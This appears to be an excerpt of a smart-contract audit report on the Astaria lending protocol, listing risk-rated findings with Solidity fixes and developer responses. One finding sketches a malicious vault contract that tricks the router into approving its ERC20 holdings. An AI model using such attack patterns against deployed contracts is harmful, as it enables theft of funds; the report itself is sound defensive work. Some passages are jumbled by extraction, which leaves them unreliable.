Astaria: Acknowledged.
Spearbit: Acknowledged.
+5.2.22 Public vault's yIntercept is not updated when the full amount owed is not paid out by a Seaport auction.
Severity: High Risk
Context: LienToken.sol#L587
Description: When the full amountOwed for a lien is not paid out during the callback from Seaport to a collateral's ClearingHouse, and the payee is a public vault, we would need to decrement the yIntercept; otherwise payee.totalAssets() would reflect a wrong value.
Recommendation: When the above scenario happens, make sure to call decreaseYIntercept with the difference between amountOwed and the payment received from the Seaport auction sale.
Astaria: Solved by PR 219.
Spearbit: Verified.
+5.2.23 LienToken payee not reset on transfer
Severity: High Risk
Context: LienToken.sol#L303-L313
Description: payee and ownerOf are detached, in that the owner may set payee and the owner may transfer the LienToken to a new owner. payee does not reset on transfer. Exploit scenario:
• Owner of a LienToken sets themselves as payee.
• Owner of the LienToken sells the lien to a new owner.
• New owner does not update payee.
• Payments go to the address set by the old owner.
Recommendation: Reset payee on transfer.

    function transferFrom(
      address from,
      address to,
      uint256 id
    ) public override(ERC721, IERC721) {
      LienStorage storage s = _loadLienStorageSlot();
      if (s.lienMeta[id].atLiquidation) {
        revert InvalidState(InvalidStates.COLLATERAL_AUCTION);
      }
  +   delete s.lienMeta[id].payee;
  +   emit PayeeChanged(id, address(0));
      super.transferFrom(from, to, id);
    }

+5.2.24 WithdrawProxy allows redemptions before PublicVault calls transferWithdrawReserve
Severity: High Risk
Context: WithdrawProxy.sol#L172-L175
Description: Anytime there is a withdraw pending (i.e. someone holds WithdrawProxy shares), shares may be redeemed so long as totalAssets() > 0 and s.finalAuctionEnd == 0.
• Option 2: Instead of inferring when it is safe to withdraw based on finalAuctionEnd and withdrawReserveReceived, con- sider explicitly marking the withdraws as open when it is both safe to withdraw (i.e. expected funds deposited) and the vault has claimed its share. 31 5.3 Medium Risk +5.3.1 Point.position is not updated for stack slots in _removeStackPosition Severity: Medium Risk Context: • LienToken.sol#L402 • LienToken.sol#L809 is created, the newSlot.point.position is set In _createLien, when a new stack slot Description: uint8(params.stack.length) which would be its index in the stack. When _removeStackPosition is called to remove a slot newStack[i].point.position is not updated for indexes that are greater than position in the original stack. Also slot.point.position is only used when we emit AddLien and LienStackUpdated events. In both of those cases, we could have used params.stack.length Recommendation: If it is necessary to keep slot.point.position due to future upgrades, make sure to update _removeStackPosition so that it updates the positions as well. Otherwise, slot.point.position can be removed. Astaria: Issue is fixed in commit fa175c by removing the slot.point.position. from the stack at index position, the to Spearbit: Verified. +5.3.2 unchecked may cause under/overflows Severity: Medium Risk PublicVault.sol#L563, LienToken.sol#L424, LienToken.sol#L482, PublicVault.sol#L376, PublicVault.sol#L422, Public- Context: Vault.sol#L439, PublicVault.sol#L490, PublicVault.sol#L578, PublicVault.sol#L611, PublicVault.sol#L527, PublicVault.sol#L544, VaultImplementation.sol#L401, WithdrawProxy.sol#L254, WithdrawProxy.sol#L293 Description: unchecked should only be used when there is a guarantee of no underflows or overflows, or when they are taken into account. In absence of certainty, it's better to avoid unchecked to favor correctness over gas efficiency. For instance, if by error, protocolFeeNumerator is set to be greater than protocolFeeDenominator, this block in _handleProtocolFee() will underflow: PublicVault.sol#L640, unchecked { amount -= fee; } However, later this reverts due to the ERC20 transfer of an unusually high amount. This is just to demonstrate that unknown bugs can lead to under/overflows. Recommendation: Reason about each unchecked and remove them in absence of absolute certainty of safety. Astaria: Acknowledged. We'll put checks on setting protocol values to not cross unintended boundaries. Spearbit: Acknowledged. 32 +5.3.3 Multiple ERC4626Router and ERC4626RouterBase functions will always revert Severity: Medium Risk Context: • ERC4626Router.sol#L49-58 • ERC4626RouterBase.sol#L47 • ERC4626RouterBase.sol#L60 Description: The intention of the ERC4626Router.sol functions is that they are approval-less ways to deposit and redeem: // For the below, no approval needed, assumes vault is already max approved As long as the user has approved the TRANSFER_PROXY for WETH, this works for the depositToVault function: • WETH is transferred from user to the router with pullTokens. • The router approves the vault for the correct amount of WETH. • vault.deposit() is called, which uses safeTransferFrom to transfer WETH from router into vault. However, for the redeemMax function, it doesn't work: • Approves the vault to spend the router's WETH. • vault.redeem() is called, which tries to transfer vault tokens from the router to the vault, and then mints withdraw proxy tokens to the receiver. 
This error happens assuming that the vault tokens would be burned, in which case the logic would work. But since they are transferred into the vault until the end of the epoch, we require approvals. The same issue also exists in these two functions in ERC4626RouterBase.sol: • redeem(): this is where the incorrect approval lives, so the same issue occurs when it is called directly. • withdraw(): the same faulty approval exists in this function. Recommendation: redeemMax should follow the same flow as deposit to make this work: • redeemMax should pullTokens to pull the vault tokens from the user. • The router should approve the vault to spend its own tokens, not WETH. • Then we can call vault.redeem() and it will work as intended. Both the ERC4626RouterBase functions should change the approval to be vault tokens rather than WETH: - ERC20(vault.asset()).safeApprove(address(vault), amount); + vault.safeApprove(address(vault), amount); +5.3.4 UniV3 tokens with fees can bypass strategist checks Severity: Medium Risk Context: UNI_V3Validator.sol#L117-119 Description: Each UniV3 strategy includes a value for fee in nlrDetails that is used to constrain their strategy to UniV3 pools with matching fees. This is enforced with the following check (where details.fee is the strategist's set fee, and fee is the fee returned from Uniswap): if (details.fee != uint24(0) && fee != details.fee) { revert InvalidFee(); } 33 This means that if you set details.fee to 0, this check will pass, even if the real fee is greater than zero. Recommendation: If this is the intended behavior and you would like strategists to have a number they can use to accept all fee levels, I would recommend choosing a number other than zero (since it's a realistic value that strategists may want to set fees for). Otherwise, adjust the check as follows: - if (details.fee != uint24(0) && fee != details.fee) { + if (fee != details.fee) { revert InvalidFee(); } For more flexibility, you could also allow all fees lower than the strategist set fee to be acceptable: - if (details.fee != uint24(0) && fee != details.fee) { + if (fee > details.fee) { revert InvalidFee(); } +5.3.5 If auction time is reduced, withdrawProxy can lock funds from final auctions Severity: Medium Risk Context: WithdrawProxy.sol#L295 Description: When a new liquidation happens, the withdrawProxy sets s.finalAuctionEnd to be equal to the new incoming auction end. This will usually be fine, because new auctions start later than old auctions, and they all have the same length. However, if the auction time is reduced on the Router, it is possible for a new auction to have an end time that is sooner than an old auction. The result will be that the WithdrawProxy is claimable before it should be, and then will lock and not allow anyone to claim the funds from the final auction. Recommendation: Replace this with a check like: uint40 auctionEnd = (block.timestamp + finalAuctionDelta).safeCastTo40(); if (auctionEnd > s.finalAuctionEnd) s.finalAuctionEnd = auctionEnd; Astaria: Fixed in commit 050487. Spearbit: Verified. +5.3.6 claim() will underflow and revert for all tokens without 18 decimals Severity: Medium Risk Context: WithdrawProxy.sol#238-244 Description: In the claim() function, the amount to decrease the Y intercept of the vault is calculated as: (s.expected - balance).mulWadDown(10**ERC20(asset()).decimals() - s.withdrawRatio) s.withdrawRatio is represented as a WAD (18 decimals). 
As a result, using any token with a number of decimals under 17 (assuming the withdraw ratio is greater than 10%) will lead to an underflow and cause the function to revert. In this situation, the token's decimals don't matter. They are captured in s.expected and balance, and are also the scale at which the vault's y-intercept is measured, so there's no need to adjust for them. Note: I know this isn't a risk in the current implementation, since it's WETH-only, but since you are planning to generalize to accept all ERC20s, this is important.
Recommendation:

    if (balance < s.expected) {
      PublicVault(VAULT()).decreaseYIntercept(
        (s.expected - balance).mulWadDown(
  -       10**ERC20(asset()).decimals() - s.withdrawRatio
  +       1e18 - s.withdrawRatio
        )
      );
    }

+5.3.7 Call to Royalty Engine can block NFT auction
Severity: Medium Risk
Context: CollateralToken.sol#L481
Description: _generateValidOrderParameters() calls ROYALTY_ENGINE.getRoyaltyView() twice. The first call is wrapped in a try/catch, which lets Astaria continue even if getRoyaltyView() reverts. However, the second call is not safe from this. Both calls have the same parameters passed to them except the price (startingPrice vs endingPrice). In case they are different, there exists a possibility that the second call can revert.
Recommendation: Wrap the second call in a try/catch. In case of a revert, the execution will be transferred to an empty catch block. Here is a sample:

  if (foundRecipients.length > 0) {
    try
      s.ROYALTY_ENGINE.getRoyaltyView(
        underlying.tokenContract,
        underlying.tokenId,
        endingPrice
      )
    returns (address payable[] memory, uint256[] memory foundEndAmounts) {
      recipients = foundRecipients;
      royaltyStartingAmounts = foundAmounts;
      royaltyEndingAmounts = foundEndAmounts;
    } catch {}
  }

Astaria: Acknowledged. We have a change pending that removes the royalty engine as part of multi-token.
Spearbit: Acknowledged.
+5.3.8 Expired liens taken from public vaults need to be liquidated, otherwise processing an epoch halts/reverts
Severity: Medium Risk
Context: PublicVault.sol#L275-L277
Description: s.epochData[s.currentEpoch].liensOpenForEpoch is decremented, or is supposed to be decremented, when, for a lien with an end that falls on this epoch:
• The full payment has been made,
• Or the lien is bought out by a lien that is from a different vault or ends at a higher epoch,
• Or the lien is liquidated.
If for some reason a lien expires and no one calls liquidate, then s.epochData[s.currentEpoch].liensOpenForEpoch > 0 will be true and processEpoch() will revert until someone calls liquidate. Note that a lien's end falling in s.currentEpoch and timeToEpochEnd() == 0 together imply that the lien is expired.
Recommendation: Astaria would need to have a monitoring solution set up to make sure the liquidate endpoint gets called for expired liens without delay.
Astaria: Acknowledged.
Spearbit: Acknowledged.
+5.3.9 assets < s.depositCap invariant can be broken for public vaults with non-zero deposit caps
Severity: Medium Risk
Context:
• PublicVault.sol#L207-L208
• PublicVault.sol#L231-L232
Description: The following check in mint / deposit does not take into consideration the new shares / amount supplied to the endpoint, since the yIntercept in totalAssets() is only updated after calling super.mint(shares, receiver) or super.deposit(amount, receiver) with the afterDeposit hook.
  uint256 assets = totalAssets();
  if (s.depositCap != 0 && assets >= s.depositCap) {
    revert InvalidState(InvalidStates.DEPOSIT_CAP_EXCEEDED);
  }

Thus the new shares or amount provided can be a really big number compared to s.depositCap, but the call will still go through.
Recommendation: For the inequality assets < s.depositCap to always hold, we would need to calculate the to-be-updated value of assets beforehand and then perform the check.
+5.3.10 redeemFutureEpoch transfers the shares from the msg.sender to the vault instead of from the owner
Severity: Medium Risk
Context: PublicVault.sol#L143
Description: redeemFutureEpoch transfers the vault shares from the msg.sender to the vault instead of from the owner.
Recommendation: The 1st parameter passed to ERC20(address(this)).safeTransferFrom needs to be the owner:

  - ERC20(address(this)).safeTransferFrom(msg.sender, address(this), shares);
  + ERC20(address(this)).safeTransferFrom(owner, address(this), shares);

Astaria: Fixed in 443b0e01263755a64c98e3554b43a8fbfa1de215.
Spearbit: Verified.
+5.3.11 Lien buyouts can push maxPotentialDebt over the limit
Severity: Medium Risk
Context: LienToken.sol#L143-148
Description: When a lien is bought out, _buyoutLien calls _getMaxPotentialDebtForCollateral to confirm that this number is lower than the maxPotentialDebt specified in the lien. However, this function is called with the existing stack, which hasn't yet replaced the lien with the new, bought-out lien. Valid refinances can make the rate lower or the duration longer. In the case that a lien was bought out for a longer duration, maxPotentialDebt will increase and could go over the limit specified in the lien.
Recommendation: Perform this check after the old lien has been replaced by the new lien in the stack.
Astaria: Fixed in PR 211.
Spearbit: Verified.
+5.3.12 Liens cannot be bought out once we've reached the maximum number of active liens on one collateral
Severity: Medium Risk
Context: LienToken.sol#L373-375
Description: The buyoutLien function is intended to transfer ownership of a lien from one user to another. In practice, it creates a new lien by calling _createLien and then calls _replaceStackAtPositionWithNewLien to update the stack. In the _createLien function, there is a check to ensure we don't take out more than maxLiens against one piece of collateral:

  if (params.stack.length >= s.maxLiens) {
    revert InvalidState(InvalidStates.MAX_LIENS);
  }

The result is that, when we already have maxLiens and we try to buy one out, this function will revert.
Recommendation: Move this check from _createLien into the _appendStack function, which is only called when new liens are created rather than when they are bought out.
Astaria: Fixed in PR 213.
Spearbit: Verified.
+5.3.13 First vault deposit can cause excessive rounding
Severity: Medium Risk
Context: ERC4626-Cloned.sol#L130
Description: Aside from storage layout/getters, the context above notes the other major departure from Solmate's ERC4626 implementation. The modification requires the initial mint to cost 10 full WETH.
// minter transfers 10 WETH to the vault ERC20(asset()).safeTransferFrom(msg.sender, address(this), assets); // shares received are based on user input _mint(receiver, shares); emit Deposit(msg.sender, receiver, assets, shares); afterDeposit(assets, shares); } Astaria highlighted that the code diff from Solmate is in relation to this finding from the previous Sherlock audit. However, deposit is still unchanged and the initial deposit may be 1 wei worth of WETH, in return for 1 wad worth of vault shares. Further, the previously cited issue may still surface by calling mint in a way that sets the price per share high (e.g. 10 shares for 10 WETH produces a price per of 1:1e18). Albeit, at a higher cost to the minter to set the initial price that high. Recommendation: Revert the hardcoding of 10e18 in previewMint and previewWithdraw, this will require the first minting to be 1:1 asset to share price. Prevent share price manipulation, add a condition in each of mint and deposit reverting if assets (when de- positing) or shares (when minting) not above the minimum asset amount when totalSupply() == 0. This comes at the cost of a duplicate storage read. For WETH vaults, minimum asset amount for initial deposit can be a small amount, such as 100 gwei so long as shares are issued 1:1 for the first mint/deposit. +5.3.14 When the collateral is listed on SeaPort by the borrower using listForSaleOnSeaport, when settled the liquidation fee will be sent to address(0) Severity: Medium Risk Context: LienToken.sol#L472-L477 is listed on SeaPort by the borrower using listForSaleOnSeaport, Description: When the collateral s.auctionData[collateralId].liquidator (s.auctionData in general) will not be set and so it will be address(0) and thus the liquidatorPayment will be sent to address(0). Recommendation: Before calculating and transferring the liquidation fee make sure that the liquidator is not address(0). Astaria: Fixed in PR 206. Spearbit: Verified. 38 +5.3.15 potentialDebt is not compared against a new lien's maxPotentialDebt in _appendStack Severity: Medium Risk Context: LienToken.sol#L435-L439 Description: In _appendStack, we have the following block: newStack = new Stack[](stack.length + 1); newStack[stack.length] = newSlot; uint256 potentialDebt = _getOwed(newSlot, newSlot.point.end); ... if ( stack.length > 0 && potentialDebt > newSlot.lien.details.maxPotentialDebt ) { revert InvalidState(InvalidStates.DEBT_LIMIT); } Note, we are only performing a comparison between newSlot.lien.details.maxPotentialDebt and poten- tialDebt when stack.length > 0. If _createLien is called with params.stack.length == 0, we would not perform this check and thus the input params is not fully checked for misconfiguration. Recommendation: Make sure to perform this check in either _createLien or here in _appendStack by removing the stack.length > 0 condition: // `potentialDebt` needs to be calculated in `_createLien` if ( potentialDebt > params.lien.details.maxPotentialDebt ) { revert InvalidState(InvalidStates.DEBT_LIMIT); } Astaria: Acknowledged. Spearbit: Acknowledged. +5.3.16 Previous withdraw proxy's withdrawReserveReceived is not updated when assets are drained from the current withdraw proxy to the previous Severity: Medium Risk Context: PublicVault.sol#L378-L381 Description: When drain is called, we don't update the s.epochData[s.currentEpoch - 1]'s withdrawRe- serveReceived, this is in contrast to when withdraw reserves are transferred from the public vault to the withdraw proxy. 
This unlinks the previous withdraw proxy's withdrawReserveReceived storage parameter from the total amount of assets it has received from either the public vault or the current withdraw proxy. An actor can manipulate the value of $B_{n-1} - W_{n-1}$ by sending assets to the public vault and the current withdraw proxy before calling transferWithdrawReserve ($B_{n-1}$ is the previous withdraw proxy's asset balance, $W_{n-1}$ is the previous withdraw proxy's withdrawReserveReceived, and $n$ is the public vault's epoch). $B_{n-1} - W_{n-1}$ should really represent the sum of all near-boundary auction payments the previous withdraw proxy receives, plus any assets that are transferred to it by an external actor. Related Issue 46.
Recommendation: The current behavior of draining assets from the current withdraw proxy to the previous one is inconsistent with the transfer of assets from the public vault to the previous withdraw proxy, which:
• Updates the public vault's s.withdrawReserve.
• Transfers the assets.
• Updates the previous withdraw proxy's withdrawReserveReceived.
In the case of drain, the first two points are performed but the last one is missing. Based on the behavior and other calculations, it seems that withdrawReserveReceived would also need to be updated.
+5.3.17 Update solc version and use unchecked in Uniswap related libraries
Severity: Medium Risk
Context: FullMathUniswap.sol, LiquidityAmounts.sol, TickMath.sol
Description: The highlighted libraries above are referenced from the Uniswap codebase, which is intended to work with Solidity compiler <0.8. These older versions have unchecked arithmetic by default, and the code takes this into account. Astaria code is intended to work with Solidity compiler >=0.8, which doesn't have unchecked arithmetic by default. Hence, to port the code, it has to be turned on via the unchecked keyword. For example, FullMathUniswap.mulDiv(type(uint).max, type(uint).max, type(uint).max) reverts for v0.8, but returns type(uint).max for older versions.
Recommendation:
• Update the pragma of all three files to:

  pragma solidity ^0.8.4;

• Wrap all the function bodies in unchecked.
Astaria: Fixed in PR 9.
Spearbit: Verified.
5.4 Low Risk
+5.4.1 buyoutLien is prone to race conditions
Severity: Low Risk
Context:
• LienToken.sol#L102
• VaultImplementation.sol#L305
Description: LienToken.buyoutLien and VaultImplementation.buyoutLien are both prone to race conditions where multiple vaults can try to front-run each other's buyoutLien calls to end up registering their own lien. Also note that, due to the storage values s.minInterestBPS and s.minDurationIncrease being used in isValidRefinance, the winning buyoutLien call does not necessarily have the best rate or duration among the other candidates in the race.
Recommendation: Make sure to document this. The current race between the vaults is not ideal for vaults and only sometimes favors picking the best liens for the borrower. A better mechanism to avoid the race condition would be to introduce an auctioning process for buying out a lien, and to make sure the auction's picking strategy is sound.
Astaria: Acknowledged.
Spearbit: Acknowledged.
• to parameter of transfer.
• to parameter of _mint.
• from parameter of _burn.
As an example, one can transfer or transferFrom to address(0), which would render that amount of tokens unusable but does not update the total supply, in contrast to if _burn was called.
Recommendation: The decision to not check that these addresses cannot be assigned address(0) goes against the OpenZeppelin implementation of ERC20. It is recommended to have these checks to avoid introducing quirks regarding address(0).
Astaria: Acknowledged.
Spearbit: Acknowledged.

+5.4.3 BEACON_PROXY_IMPLEMENTATION and WETH cannot be updated for AstariaRouter
Severity: Low Risk
Context:
• IAstariaRouter.sol#L67
• IAstariaRouter.sol#L72
Description: There is no update mechanism for BEACON_PROXY_IMPLEMENTATION and WETH in AstariaRouter. It would make sense to keep WETH non-upgradable (unless the wrong address is provided to the constructor), but for BEACON_PROXY_IMPLEMENTATION there could be a case for potentially upgrading it.
Recommendation: If there is no plan to add an upgrading mechanism to these storage parameters, they can be defined as immutables. Also, if there is a plan to use a diamond/facet pattern for the AstariaRouter and related contracts, it might be best to document it to make the reasoning for the current storage structures clearer. And finally, since other implementation parameters have been made upgradable, it would make sense to also make BEACON_PROXY_IMPLEMENTATION upgradable, or document why it is not so currently.
Astaria: wETH being a storage variable is removed in an open PR, so will acknowledge the lack of a setter; it came from a previously immutable design. The beacon proxy is not designed to be updated either in its current form, as any changes to the underlying or new features would leave older proxies in the dust.
Spearbit: Acknowledged by Astaria.

+5.4.4 Incorrect key parameter type is used for s.epochData
Severity: Low Risk
Context: PublicVault.sol
Description: In PublicVault, whenever an epoch key is provided to the mapping s.epochData, its type is uint64, but the key type of s.epochData is uint256 (mapping(uint256 => EpochData)).
Recommendation: Since the epochs have uint64 type, it would be best to define VaultData as:

struct VaultData {
  uint88 yIntercept;
  uint48 slope;
  uint40 last;
  uint64 currentEpoch; // <-- pay attention to the type of epochs
  uint88 withdrawReserve;
  uint88 liquidationWithdrawRatio;
  uint88 strategistUnclaimedShares;
  mapping(uint64 => EpochData) epochData; // <-- changed line
}

+5.4.5 buyoutLien, canLiquidate and makePayment have different notions of expired liens when considering edge cases
Severity: Low Risk
Context:
• VaultImplementation.sol#L305
• LienToken.sol#L731
• AstariaRouter.sol#L509
Description: When swapping out a lien that has just expired (the lien's end t_end equals the current timestamp t_now), one can call buyoutLien to swap it out. But when t_now > t_end, buyoutLien reverts due to the underflow in _getRemainingInterest when calculating the buyout amount. This is in contrast to canLiquidate, which allows a lien with t_now = t_end to be liquidated as well. makePayment also only considers t_end < t_now as expired liens. So the expired/non-functional lien time ranges for the different endpoints are:

endpoint       expired range
buyoutLien     (t_end, ∞)
canLiquidate   [t_end, ∞)
makePayment    (t_end, ∞)

Recommendation: Make sure the edge case of t_now = t_end is treated consistently for expired liens across the 3 endpoints in this context.
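One way to make the treatment uniform is to route all three endpoints through a single predicate that treats [t_end, ∞) as expired. A minimal sketch (not Astaria's code; _isExpired is a hypothetical helper):

// Hypothetical shared helper: every endpoint agrees a lien is expired
// from t_end onwards, i.e. over the range [t_end, ∞).
function _isExpired(ILienToken.Stack memory stack) internal view returns (bool) {
  return block.timestamp >= stack.point.end;
}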
Astaria: All the ranges have been unified to consider [t_end, ∞) as the expired range in commit 36ceb.
Spearbit: Verified.

+5.4.6 Ensure all ratios are less than 1
Severity: Low Risk
Context: AstariaRouter.sol#L212-L227
Description: Although numerators and denominators for different fees are set by the admin, it is good practice to add a check in the contract for absurd values. In this case, that would be when the numerator is greater than the denominator.
Recommendation: Add a require check for each numerator highlighted in Context:

require(numerator < denominator, "MAX_FEE_EXCEEDED");

You can also use custom errors instead.
Astaria: Fixed in commits b43317 and a883a3.
Spearbit: Verified.

+5.4.7 Factor out s.slope updates
Severity: Low Risk
Context:
• PublicVault.sol#L422
• PublicVault.sol#L491
• PublicVault.sol#L528
• PublicVault.sol#L579
• PublicVault.sol#L615
Description: Slope updates occur in multiple locations but do not emit events.
Recommendation: Emit an event when updating slope. For ease of testing, consider moving slope updates to an internal function and emitting an event when it is called.

+5.4.8 External call to arbitrary address
Severity: Low Risk
Context: AstariaRouter.commitToLiens, AstariaRouter._executeCommitment
Description: The Router has a convenience function to commit to multiple liens, AstariaRouter.commitToLiens. This function causes the router to receive WETH and allows the caller to supply an arbitrary vault address lienRequest.strategy.vault, which is called by the router. This allows the caller to potentially re-enter in the middle of the loop, and also to drain any WETH that happens to be in the Router. In our review, no immediate reason for the Router to hold WETH outside of commitToLiens calls was identified, and therefore the severity of this finding is low.
Recommendation: To protect against potential malicious calls, isValidVault should be checked against any calls to vaults.

+5.4.9 Astaria's Seaport orders may not be listed on OpenSea
Severity: Low Risk
Context: CollateralToken.sol#L524-L530
Description: To list Seaport orders on OpenSea, the order should pass certain validations as described here (see OpenSea Order Validation). Currently, Astaria orders will fail this validation. For instance, zone and zoneHash values are not set as suggested.
Recommendation: Either follow the guidelines completely to list the orders on OpenSea, or, if that is not the intention, remove OS_FEE_PAYEE from the consideration items.
Astaria: Acknowledged. We're going to change our approach and wait for Seaport 1.2.
Spearbit: Acknowledged.

+5.4.10 Any ERC20 held in the Router can be stolen using ERC4626RouterBase functions
Severity: Low Risk
Context: ERC4626RouterBase.sol#L15-65
Description: All four functions in ERC4626RouterBase.sol take in a vault address, a to address, a shares amount, and a maxAmountIn for validation. The first step is to read vault.asset() and then approve the vault to spend the ERC20 at whatever address is returned for the given amount.
function mint(
  IERC4626 vault,
  address to,
  uint256 shares,
  uint256 maxAmountIn
) public payable virtual override returns (uint256 amountIn) {
  ERC20(vault.asset()).safeApprove(address(vault), shares);
  if ((amountIn = vault.mint(shares, to)) > maxAmountIn) {
    revert MaxAmountError();
  }
}

In the event that the Router holds any ERC20, a malicious user can design a contract with the following functions:

function asset() public pure returns (address) {
  return [ERC20 the router holds];
}

function mint(uint shares, address to) public pure returns (uint) {
  return 0;
}

If this contract is passed as the vault, the function will pass, and the router will approve this contract to control its holdings of the given ERC20.
Recommendation: These functions should validate that the vault being passed into the contract is a legitimate Astaria vault.
Astaria: Accepted recommendations, fixed in PR 253.
Spearbit: Confirmed, the following commit fixes this issue by overriding the functions and adding a validVault() modifier to them, so only valid vaults can be used in the function.

+5.4.11 Inconsistency in byte size of maxInterestRate
Severity: Low Risk
Context: AstariaRouter.sol#L246
Description: In RouterStorage, maxInterestRate has a size of uint88. However, when being set from file(), it is capped at uint48 by the safeCastTo48() function.
Recommendation: Make sure these two values align.
Astaria: Fixed in PR 246.
Spearbit: Verified.

+5.4.12 Router#file has update for nonexistent MinInterestRate variable
Severity: Low Risk
Context: AstariaRouter.sol#L247-248
Description: One of the options in the file() function is to update FileType.MinInterestRate. There are two problems here: 1) If someone chooses this FileType, the update actually happens to s.maxInterestRate. 2) There is no minInterestRate storage variable, as minInterestBPS is handled on L235-236.
Recommendation: Remove the else if block on L247-248.
Astaria: Fixed in PR 230.
Spearbit: Verified.

+5.4.13 getLiquidationWithdrawRatio() and getYIntercept() have incorrect return types
Severity: Low Risk
Context:
• PublicVault.sol#L170-L172
• PublicVault.sol#L174-L176
Description: liquidationWithdrawRatio and yIntercept, like other amount-related parameters, are of type uint88, and they are the returned values of getLiquidationWithdrawRatio() and getYIntercept() respectively. But the return types of getLiquidationWithdrawRatio() and getYIntercept() are defined as uint256.
Recommendation: Change the return types of getLiquidationWithdrawRatio() and getYIntercept() to uint88:

function getLiquidationWithdrawRatio() public view returns (uint88) {
  return _loadStorageSlot().liquidationWithdrawRatio;
}

function getYIntercept() public view returns (uint88) {
  return _loadStorageSlot().yIntercept;
}

+5.4.14 The modified implementation of redeem is omitting a check to make sure not to redeem 0 assets
Severity: Low Risk
Context:
• PublicVault.sol#L108
• PublicVault.sol#L141
Description: The modified implementation of redeem is omitting the check

// Check for rounding error since we round down in previewRedeem.
require((assets = previewRedeem(shares)) != 0, "ZERO_ASSETS");

You can see a trail of it in redeemFutureEpoch.
Recommendation: It is recommended to reintroduce the check to make sure that 0 assets are not allowed to be redeemed, or to document the decision as to why the check was omitted.
Astaria: Fixed in PR 227.
Spearbit: Verified.

+5.4.15 PublicVault's redeem and redeemFutureEpoch always return 0 assets
Severity: Low Risk
Context:
• PublicVault.sol#L133
• PublicVault.sol#L148
• PublicVault.sol#L114
Description: assets returned by redeem and redeemFutureEpoch will always be 0, since it has not been set in redeemFutureEpoch. The Withdraw event also emits an incorrect value for assets because of this. The issue stems from trying to consolidate some of the logic for redeem and withdraw by using redeemFutureEpoch for both of them.
Recommendation: Make sure the amount of assets is calculated for these endpoints, and pay extra attention to the two different routings of withdraw and redeem.
Astaria: Fixed in PR 227.
Spearbit: Verified.

+5.4.16 OWNER() cannot be updated for private or public vaults
Severity: Low Risk
Context: AstariaVaultBase.sol#L22-L24
Description: owner() is immutable data for any ClonesWithImmutableArgs.clone that uses AstariaVaultBase. That means, for example, that if there is an issue with the current hardcoded owner() there is no way to update it, and liquidity/assets in the public/private vaults would also be at risk.
Recommendation: It might be best to allow change of ownership for vaults. The upgradeability for the owner might be more important than for the router, as mentioned in PR 107.
Astaria: Acknowledged. We don't want strategists to be able to assign someone else to their vaults, this is working as intended.
Spearbit: Acknowledged.

+5.4.17 ROUTER() cannot be updated for private or public vaults
Severity: Low Risk
Context: AstariaVaultBase.sol#L14-L16
Description: ROUTER() is immutable data for any ClonesWithImmutableArgs.clone that uses AstariaVaultBase. That means, for example, that if there is an issue with the current hardcoded ROUTER(), or it needs to be upgraded, the current public/private vaults would not be able to communicate with the new ROUTER.
Recommendation: This is something to keep in mind regarding the architecture of the protocol, as the upgradability of the router can break the connection between it and the vaults.
Astaria: Acknowledged. We have a planned update that makes LienToken/CollateralToken/AstariaRouter all upgradeable proxies; this is working as intended.
Spearbit: Acknowledged.

+5.4.18 Wrong return parameter type is used for getOwed
Severity: Low Risk
Context:
• LienToken.sol#L693
• LienToken.sol#L701
Description: Both variations of getOwed use _getOwed and return uint192. But _getOwed returns a uint88.
Recommendation: The return types of both getOwed variations need to be changed to uint88. Also, note that most parameters that deal with lien amounts have the uint88 type.

+5.4.19 Document and reason about which functionalities should be frozen on protocol pause
Severity: Low Risk
Context: PublicVault.sol#L247, PublicVault.sol#L338
Description: On protocol pause, a few functions are allowed to be called. Some instances are noted above. There is no documentation on why these functionalities are allowed while the remaining functions are frozen.
Recommendation: Guidelines should be provided that specify which functionalities should keep working when the protocol is paused.
Astaria: Acknowledged. There is no harm letting people withdraw their money through the epoch system, but there is immense harm in allowing any deposits to come in or new loans to go out, as the pause would be due to some emergency or something that requires a contract update. When crystalizing the protocol we would remove the pause from the implementation before bricking upgrades.
Spearbit: Acknowledged.
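To illustrate the split Astaria describes above (exits stay open, inflows freeze), here is a minimal sketch; it is not Astaria's code, and the contract and function bodies are hypothetical:

pragma solidity ^0.8.17;

contract PausableVaultSketch {
  address public guardian;
  bool public paused;

  constructor() {
    guardian = msg.sender;
  }

  modifier whenNotPaused() {
    require(!paused, "PAUSED");
    _;
  }

  function setPaused(bool p) external {
    require(msg.sender == guardian);
    paused = p;
  }

  // Inflows are frozen on pause: no new deposits while paused.
  function deposit(uint256 assets, address receiver) external whenNotPaused {
    // ... mint shares against the deposited assets (elided)
  }

  // Exits intentionally remain callable so LPs can always withdraw.
  function redeem(uint256 shares, address receiver) external {
    // ... burn shares and transfer assets out (elided)
  }
}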
+5.4.20 Wrong parameter type is used for s.strategyValidators
Severity: Low Risk
Context:
• IAstariaRouter.sol#L82
• AstariaRouter.sol#L254
• AstariaRouter.sol#L345
• AstariaRouter.sol#L349
Description: s.strategyValidators is of type mapping(uint32 => address), but the provided TYPE in the context is of type uint8.
Recommendation: Make sure the typing is correct: either use mapping(uint32 => address) or mapping(uint8 => address).
Astaria: Fixed by changing the type of s.strategyValidators to mapping(uint8 => address) in PR 241.
Spearbit: Verified.

+5.4.21 Some functions do not emit events, but they should
Severity: Low Risk
Context:
• AstariaRouter.sol#L268
• VaultImplementation.sol#L195
• PublicVault.sol#L579
• PublicVault.sol#L528
• PublicVault.sol#L491
• PublicVault.sol#L565
Description: AstariaRouter.sol#L268: other filing endpoints in the same contract, and also in CollateralToken and LienToken, emit FileUpdated(what, data). But fileGuardian does not.
Recommendation: Make sure these endpoints emit events, as some off-chain agents might be monitoring the protocol for these events.
Astaria: Solved in PR 240.
Spearbit: Verified.

+5.4.22 setNewGuardian can be changed to a 2 or 3 step transfer of authority process
Severity: Low Risk
Context:
• AstariaRouter.sol#L262-L266
• AstariaRouter.sol#L268
Description: The current guardian might pass a wrong _guardian parameter to setNewGuardian, which can break the upgradability of the AstariaRouter using fileGuardian.
Recommendation: It might be best to convert the transfer of guardianship into a 2 or 3 step process.
Astaria: This is intentional, we want to be able to remove all permissions if we decide to crystalize the protocol.
Spearbit: Renouncing the guardian could possibly have its own separate endpoint.

+5.4.23 There are no range/value checks when some parameters get filed
Severity: Low Risk
Context:
• AstariaRouter.sol#L196
• AstariaRouter.sol#L268
• CollateralToken.sol#L191
• LienToken.sol#L77
Description: There are no range/value checks when some parameters get filed. For example:
• There are no hardcoded range checks for the ...Numerators and ...Denominators, so the protocol's users cannot trustlessly assume the authorized users would not push these values into ranges deemed unacceptable.
• When an address gets updated, we don't check whether the value provided is address(0) or not.
Recommendation: Apply value/range checks for the parameters that can be updated using the file endpoints.

